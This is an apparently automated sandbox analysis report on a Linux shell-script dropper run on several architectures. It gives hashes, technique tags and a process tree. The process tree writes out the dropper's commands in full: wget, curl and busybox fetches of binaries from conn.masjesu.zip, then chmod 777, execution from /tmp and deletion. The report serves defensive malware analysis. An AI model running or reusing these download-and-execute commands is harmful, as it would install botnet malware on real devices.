Analysis
-
max time kernel
77s -
max time network
79s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24/11/2024, 02:03
Static task
static1
Behavioral task
behavioral1
Sample
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
-
Size
10KB
-
MD5
b3326e86c6435c58119faa00fd7de1c3
-
SHA1
706ae71f350916adfb672b819c6cca8e1ab5fdc5
-
SHA256
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9
-
SHA512
e6eeba93a0d3074d2942fa787cb23d5458e0ead7df8bf5597fd29134ad3ebe1b1e194f62c0117c29e98527b067eea7ae78a44ac9fc7302ef04b873e7585362aa
-
SSDEEP
192:o2tYFkg5W+fWyW5cE9JxKDXgGyW5cEHJxKDXsWkg5W+l:o2tYLo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 874 chmod 916 chmod 958 chmod 965 chmod 1000 chmod 843 chmod 888 chmod 895 chmod 857 chmod 930 chmod 951 chmod 986 chmod 799 chmod 881 chmod 819 chmod 937 chmod 979 chmod 1007 chmod 792 chmod 902 chmod 909 chmod 923 chmod 972 chmod 993 chmod 850 chmod 864 chmod 944 chmod 740 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 741 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs 793 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 800 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s 821 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T 844 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z 851 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF 858 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j 865 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV 875 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH 882 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj 889 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU 896 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr 903 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya 910 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV 917 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH 924 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj 931 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU 938 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr 945 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya 952 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 959 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s 966 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T 973 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 980 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs 987 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z 994 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF 1001 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j 1008 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 860 wget 873 busybox 884 wget 943 busybox 795 wget 853 wget 929 busybox 1003 wget 964 busybox 1004 curl 798 busybox 905 wget 913 curl 920 curl 933 wget 861 curl 885 curl 899 curl 922 busybox 978 busybox 968 wget 974 rm 996 wget 999 busybox 845 rm 975 wget 992 busybox 997 curl 878 curl 894 busybox 912 wget 730 curl 743 wget 807 curl 815 busybox 854 curl 976 curl 908 busybox 919 wget 989 wget 719 wget 744 curl 847 curl 898 wget 906 curl 796 curl 844 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T 940 wget 948 curl 842 busybox 892 curl 915 busybox 954 wget 985 busybox 877 wget 880 busybox 941 curl 962 curl 990 curl 982 wget 1006 busybox 863 busybox 867 wget 927 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr curl File opened for modification /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU curl File opened for modification /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s curl File opened for modification /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s curl File opened for modification /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV curl File opened for modification /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj curl File opened for modification /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU curl File opened for modification /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya curl File opened for modification /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T curl File opened for modification /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 curl File opened for modification /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs curl File opened for modification /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z curl File opened for modification /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr curl File opened for modification /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya curl File opened for modification /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j curl File opened for modification /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF curl File opened for modification /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH curl File opened for modification /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs curl File opened for modification /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 curl File opened for modification /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF curl File opened for modification /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV curl File opened for modification /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T curl File opened for modification /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj curl File opened for modification /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z curl File opened for modification /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 curl File opened for modification /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH curl File opened for modification /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j curl File opened for modification /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 curl
Processes
-
/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- System Network Configuration Discovery
PID:719
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵PID:737
-
-
/bin/chmodchmod 777 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1./R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵PID:742
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- System Network Configuration Discovery
PID:743
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵PID:786
-
-
/bin/chmodchmod 777 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs./GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵PID:794
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- System Network Configuration Discovery
PID:795
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- System Network Configuration Discovery
PID:798
-
-
/bin/chmodchmod 777 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8./dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵PID:801
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵PID:802
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- System Network Configuration Discovery
PID:815
-
-
/bin/chmodchmod 777 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s./RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵PID:824
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵PID:825
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- System Network Configuration Discovery
PID:842
-
-
/bin/chmodchmod 777 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T./g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:844
-
-
/bin/rmrm g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- System Network Configuration Discovery
PID:845
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵PID:846
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵PID:849
-
-
/bin/chmodchmod 777 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z./JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- Executes dropped EXE
PID:851
-
-
/bin/rmrm JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵PID:852
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- System Network Configuration Discovery
PID:853
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵PID:856
-
-
/bin/chmodchmod 777 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF./Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵PID:859
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- System Network Configuration Discovery
PID:860
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- System Network Configuration Discovery
PID:863
-
-
/bin/chmodchmod 777 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j./tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵PID:866
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- System Network Configuration Discovery
PID:867
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/chmodchmod 777 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV./M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- System Network Configuration Discovery
PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH./3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵PID:887
-
-
/bin/chmodchmod 777 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj./Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU./nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵PID:901
-
-
/bin/chmodchmod 777 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr./BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵PID:904
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- System Network Configuration Discovery
PID:905
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- System Network Configuration Discovery
PID:908
-
-
/bin/chmodchmod 777 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya./1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵PID:911
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- System Network Configuration Discovery
PID:912
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- System Network Configuration Discovery
PID:915
-
-
/bin/chmodchmod 777 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV./M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- System Network Configuration Discovery
PID:919
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- System Network Configuration Discovery
PID:922
-
-
/bin/chmodchmod 777 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH./3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- System Network Configuration Discovery
PID:929
-
-
/bin/chmodchmod 777 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj./Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵PID:932
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- System Network Configuration Discovery
PID:933
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵PID:936
-
-
/bin/chmodchmod 777 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU./nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵PID:939
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- System Network Configuration Discovery
PID:940
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:941
-
-
